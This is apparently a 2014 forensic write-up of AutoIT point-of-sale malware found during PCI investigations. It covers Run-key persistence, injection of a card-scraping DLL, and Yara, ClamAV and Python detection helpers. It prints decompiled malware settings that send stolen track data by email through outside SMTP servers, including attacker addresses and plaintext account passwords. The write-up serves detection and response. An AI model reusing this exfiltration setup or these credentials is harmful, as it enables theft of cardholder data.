
AutoIT Scripting in POS Malware

March 17, 2014

Over the past few years, use of the AutoIT scripting language to create and install malware has become more prevalent [1, 2]. This trend has made its way into the POS environment as well. In three of my recent PFIs (PCI Forensic Investigations), I've come across POS malware that uses AutoIT scripting.

On two of the PFIs, the AutoIT script was named 'wow32.exe' with file sizes of 386,189 and 386,183 bytes. The third used a script named ‘cbs.exe.exe’ with a file size of 385,312 bytes.

Let’s take a look at how attackers used these scripts to compromise the environment and obtain cardholder data.

First, the attacker creates a registry key that launches the script whenever a user logs in, which means it's basically a startup program.

+ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - Name : systemupdater - Value : C:\WINDOWS\system32\1025\wow32.exe CCS.exe

'CCS.exe' is the POS server process, and its name is passed to the script as a command-line argument, so the malware isn't tied to any particular payment application software.

'wow32.exe' calls 'winhttp.exe' ('sr.exe' on the third PFI), which injects a third piece of malware ('Searcher.dll') into the POS process; that DLL does the actual scraping of cardholder data (CHD) and track data. It then writes the data to a file whose name follows the format '%s%i_%s_%i.log' (example: '5776_CCS.exe_66789.log') in 'C:\WINDOWS\system32\'.

Back to 'wow32.exe'. It uses a legitimate Microsoft library, 'cdosys.dll' (which the attacker bundles with the other malware pieces), to exfiltrate the captured data as email attachments, using the SMTP parameters specified in the AutoIT script [4].

I used one of the many UPX unpackers on the 'wow32.exe' and 'cbs.exe.exe' executables. Next, I used an excellent open source tool, 'myAutToExe.exe' [5], to decompile them, and compared the roughly 4,800 lines of AutoIT source code using the built-in Windows file compare tool, 'fc.exe'.

Here are the differences:

***** WOW32-DECOMPILE1.AU3
$PRG = "winhttp.exe"
$INTERVAL = 12
$SMTPSERVER = "67.23.166.11"
$FROMNAME = "HaHaHa ProductionN"
$FROMADDRESS = "hahaha@production.com"
$TOADDRESS = "altelenoi2012@yahoo.com"
$SUBJECT = @ComputerName & " - " & @IPAddress1
$BODY = @IPAddress1 & " - " & @IPAddress2
$CCADDRESS = ""
***** wow32-decompile2.au3
$PRG = "winhttp.exe"
$INTERVAL = 12
$SMTPSERVER = "67.23.166.11"
$FROMNAME = "HaHaHa Production"
$FROMADDRESS = "hahaha@production.com"
$TOADDRESS = "bugs1122@yahoo.com"
$SUBJECT = @ComputerName & " - " & @IPAddress1
$BODY = @IPAddress1 & " - " & @IPAddress2
$CCADDRESS = ""
***** cbs.exe-decompile.au3
$PRG = "sr.exe"
$INTERVAL = 12
$SMTPSERVER = "mail.boston-bob.eu"
$FROMNAME = "Messi"
$FROMADDRESS = "john@balboa.us"
$TOADDRESS = "paris.paris2244@yahoo.com"
$SUBJECT = @ComputerName
$BODY = @IPAddress1 & "-" & @IPAddress1
$CCADDRESS = ""
*****

***** WOW32-DECOMPILE1.AU3
$BCCADDRESS = ""
$USERNAME = "websend02@safe-deals.biz"
$PASSWORD = "rWRCRoyDGf1J"
$IPPORT = 25
***** wow32-decompile2.AU3
$BCCADDRESS = ""
$USERNAME = "websend02@safe-deals.biz"
$PASSWORD = "rWRCRoyDGf1J"
$IPPORT = 25
***** cbs.exe-decompile.au3
$BCCADDRESS = ""
$USERNAME = "bob@boston-bob.eu"
$PASSWORD = "B$Gs&yH9HytZ"
$IPPORT = 25
*****

Normally in a PFI for Level 3 and 4 merchants there is no evidence of exfiltration, because firewall logs and network traffic captures aren't available. But I got lucky: in 'pagefile.sys' I found an email with six attachments and 30 PANs with track data ('X' is used to mask sensitive data):

Ac8Ot5czDGFoz6MMRECUfYTSP0/OQg==
Thread-Topic: XXXXXXXXXX - 192.168.xxx.xx
From: "HaHaHa ProductionN"
To:
Subject: XXXXXXXXXX - 192.168.xxx.xxx
Date: Sat, 11 Jan 2014 02:26:29 -0800
Message-ID: <040531DAC0B84353AF4547B312107D3B@XXXXXXXXXX>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0219_01CF0E74.89105D60"
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message
Importance: Normal
Priority: normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4913

This is a multi-part message in MIME format.

------=_NextPart_000_0219_01CF0E74.89105D60
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

192.168.xxx.xx - 192.168.xx.xxx
CCS.exe was closed.
C:\WINDOWS\system32\1628_CCS.exe_86632.log.tmp:231:4342562158492478=16021010000000175
C:\WINDOWS\system32\5596_CCS.exe_96690.log.tmp:0:

------=_NextPart_000_0219_01CF0E74.89105D60
Content-Type: application/octet-stream; name="1628_CCS.exe_86632.log.tmp"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="1628_CCS.exe_86632.log.tmp"

434256xxxxxx2478=1602101xxxxxxxxxx
421764xxxxxx1907=1512101xxxxxxxxxxxxx
483316xxxxxx7360=1604101xxxxxxxxxxxxx
428208xxxxxx2685=1609101xxxxxxxxxxxxx
428208xxxxxx5519=1411101xxxxxxxxxxxxx
371242xxxxxx3004=1706101xxxxxxxxxxxxxx
[rest of email truncated]
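The scraper's output file naming ('%s%i_%s_%i.log', seen above as '1628_CCS.exe_86632.log.tmp') and the track-2 records it writes give a responder two things to hunt for on a POS server. The following Python triage helper is an added example, not code from the original post; it assumes the format expands to '<pid>_<process>_<counter>.log' (with a '.tmp' suffix while the file is still being written), and the sample listing and log lines are constructed.

```python
import re

# Assumption: "%s%i_%s_%i.log" expands to "<dir><pid>_<process>_<counter>.log",
# with ".tmp" appended while the scraper is still writing the file.
LOG_NAME = re.compile(r"^(\d+)_(.+?)_(\d+)\.log(\.tmp)?$", re.IGNORECASE)
# Track-2-style record: PAN '=' YYMM expiry + 3-digit service code + discretionary data.
TRACK2 = re.compile(r"^([0-9xX]{13,19})=(\d{2})(\d{2})(\d{3})")


def parse_log_name(name):
    """Return (pid, process, counter) for a scraper output file name, else None."""
    m = LOG_NAME.match(name)
    if not m:
        return None
    return int(m.group(1)), m.group(2), int(m.group(3))


def find_scraper_logs(listing, pos_process="CCS.exe"):
    """Hunt a directory listing for files named like the scraper's output for the POS process."""
    hits = []
    for name in listing:
        parsed = parse_log_name(name)
        if parsed and parsed[1].lower() == pos_process.lower():
            hits.append((name, parsed[0]))
    return hits


def parse_track2(line):
    """Parse one track-2 record into a masked PAN and expiry; None if the line is not track data."""
    m = TRACK2.match(line.strip())
    if not m:
        return None
    pan = m.group(1)
    masked = pan[:6] + "x" * (len(pan) - 10) + pan[-4:]  # keep BIN and last four only
    return {"pan_masked": masked,
            "expiry": "20" + m.group(2) + "-" + m.group(3),
            "service_code": m.group(4)}


# Constructed sample input (not from the case): a system32 listing and two log lines.
SAMPLE_LISTING = ["kernel32.dll", "5776_CCS.exe_66789.log",
                  "1628_CCS.exe_86632.log.tmp", "notes_CCS.exe_1.log"]
SAMPLE_LOG = ["4111111111111111=16021010000000175", "not track data"]


def triage(listing=SAMPLE_LISTING, log_lines=SAMPLE_LOG):
    """Summarise suspicious file names and any track-2 records found in their contents."""
    records = [r for r in (parse_track2(l) for l in log_lines) if r]
    return {"files": find_scraper_logs(listing), "records": records}
```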

I wrote Yara rules for the malware set using unique keywords, and sure enough, running them with Volatility against the POS server memory dump showed that 'Searcher.dll' was indeed injected into the POS process 'CCS.exe'.

../../volatility-2.3.1/vol.py --profile=Win2003SP2x86 -f ./memdump.mem yarascan --yara-file=../yara/rules-PFI-malware.yara

Rule: Searcher_dll
Owner: Process CCS.exe Pid 3704
0x7c55a1dc  45 6e 63 6f 64 65 50 6f 69 6e 74 65 72 00 00 00   EncodePointer...
0x7c55a1ec  4b 00 45 00 52 00 4e 00 45 00 4c 00 33 00 32 00   K.E.R.N.E.L.3.2.
0x7c55a1fc  2e 00 44 00 4c 00 4c 00 00 00 00 00 44 65 63 6f   ..D.L.L.....Deco
0x7c55a20c  64 65 50 6f 69 6e 74 65 72 00 00 00 46 6c 73 46   dePointer...FlsF
Rule: Searcher_dll
Owner: Process CCS.exe Pid 3704
0x7c55b32c  43 4f 4e 4f 55 54 24 00 53 75 6e 4d 6f 6e 54 75   CONOUT$.SunMonTu
0x7c55b33c  65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00   eWedThuFriSat...
0x7c55b34c  4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a   JanFebMarAprMayJ
0x7c55b35c  75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 74 4e 6f   unJulAugSepOctNo
Rule: Searcher_dll
Owner: Process CCS.exe Pid 3704
0x7c55b37c  25 73 25 69 5f 25 73 5f 25 69 2e 6c 6f 67 00 00   %s%i_%s_%i.log..
0x7c55b38c  00 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00   ....H...........
0x7c55b39c  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x7c55b3ac  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

I wrote some ClamAV signatures to detect the malware set using the ClamAV ‘sigtool’.

The pieces whose MD5 hashes were identical across the cases go in an *.hdb signature file (one entry per line: MD5 hash, file size, file name, separated by colons):

85fd14b070f47f0c27aed18359fdd2ad:2067968:cdosys.dll
eb53db9ccf7ba39750e797ebf48bbdef:55296:winhttp.exe
0d54107cb2a79550c349ababc28c71cb:55808:Searcher.dll

The Yara rules for use in Volatility were written based on unique keywords:

rule wow32_exe
{
    meta:
        description = "wow32-exe"
        thread_level = 3
        in_the_wild = true
    strings:
        $a = "avsupport@autoitscript.com" wide ascii
        $b = "compiled AutoIt script" wide ascii
    condition:
        $a and $b
}

rule cdosys_dll
{
    meta:
        description = "cdosys-dll"
        thread_level = 3
        in_the_wild = true
    strings:
        $a = "Microsoft CDO for Windows Library" wide ascii
        $b = "CDOSYS.DLL" wide ascii
    condition:
        $a and $b
}

rule winhttp_exe
{
    meta:
        description = "winhttp-exe"
        thread_level = 3
        in_the_wild = true
    strings:
        $a = "SeDebugPrivilege" wide ascii
        $b = "SearchInject" wide ascii
        $c = "Searcher.dll" wide ascii
    condition:
        $a and $b and $c
}

rule Searcher_dll
{
    meta:
        description = "Searcher-dll"
        thread_level = 3
        in_the_wild = true
    strings:
        $a = "EncodePointer" wide ascii
        $b = "CONOUT$" wide ascii
        $c = "%s%i_%s_%i.log" wide ascii
    condition:
        $a and $b and $c
}

I used the same unique keywords to write ClamAV logical signatures, with each keyword hex-encoded as a subsignature and the logical expression requiring all of them. Note: each signature should be on a single line.

wow32-exe;Target:0;(0&1);6176737570706f7274406175746f69747363726970742e636f6d;636f6d70696c6564204175746f497420736372697074
cdosys-dll;Target:0;(0&1);4d6963726f736f66742043444f20666f722057696e646f7773204c696272617279;43444f5359532e444c4c
winhttp-exe;Target:0;(0&1&2);5365446562756750726976696c656765;536561726368496e6a656374;53656172636865722e646c6c
Searcher-dll;Target:0;(0&1&2);456e636f6465506f696e746572;434f4e4f555424;257325695f25735f25692e6c6f67

For 'wow32.exe', keep in mind that ClamAV will unpack UPX files then run signatures against the unpacked file, but it will not automatically decompile the AutoIT script.
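Hand-encoding keywords into hex subsignatures is error-prone, so here is a small Python generator, added as an example and not part of the original post, that builds the logical signatures above from the same keyword lists, builds an *.hdb line from a file's bytes, and checks a byte buffer against an AND-only logical signature. The `KEYWORDS` table is taken from the Yara rules on this page; the checker is a simplified stand-in for ClamAV's own matching, not a reimplementation of it.

```python
import hashlib


def ldb_signature(name, keywords, target=0):
    """Build a ClamAV logical signature that fires only when every keyword is present.
    Each keyword becomes a hex subsignature; the expression ANDs all subsignature indexes."""
    subsigs = [kw.encode("ascii").hex() for kw in keywords]
    logic = "(" + "&".join(str(i) for i in range(len(subsigs))) + ")"
    return ";".join([name, "Target:%d" % target, logic] + subsigs)


def hdb_signature(data, filename):
    """Build a ClamAV hash (.hdb) line for a file's bytes: md5:size:name."""
    return "%s:%d:%s" % (hashlib.md5(data).hexdigest(), len(data), filename)


def matches_ldb(sig, data):
    """Simplified check: does the buffer contain every subsignature of an AND-only signature?
    Only ASCII is matched here, whereas the Yara rules above also match UTF-16 ('wide')."""
    parts = sig.split(";")
    return all(bytes.fromhex(h) in data for h in parts[3:])


# Keyword lists taken from the Yara rules on this page.
KEYWORDS = {
    "wow32-exe": ["avsupport@autoitscript.com", "compiled AutoIt script"],
    "cdosys-dll": ["Microsoft CDO for Windows Library", "CDOSYS.DLL"],
    "winhttp-exe": ["SeDebugPrivilege", "SearchInject", "Searcher.dll"],
    "Searcher-dll": ["EncodePointer", "CONOUT$", "%s%i_%s_%i.log"],
}


def build_ldb():
    """Return the four logical signatures, one per line, ready for a *.ldb file."""
    return [ldb_signature(n, kws) for n, kws in KEYWORDS.items()]


if __name__ == "__main__":
    print("\n".join(build_ldb()))
```

The generated lines reproduce the hand-written signatures above byte for byte, which is a cheap way to catch a mistyped hex digit before deploying a signature.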

References:

1. Autoit Malware Revisited

2. Autoit Used to Spread Malware and Toolsets

4. Microsoft Support

5. Deioncube
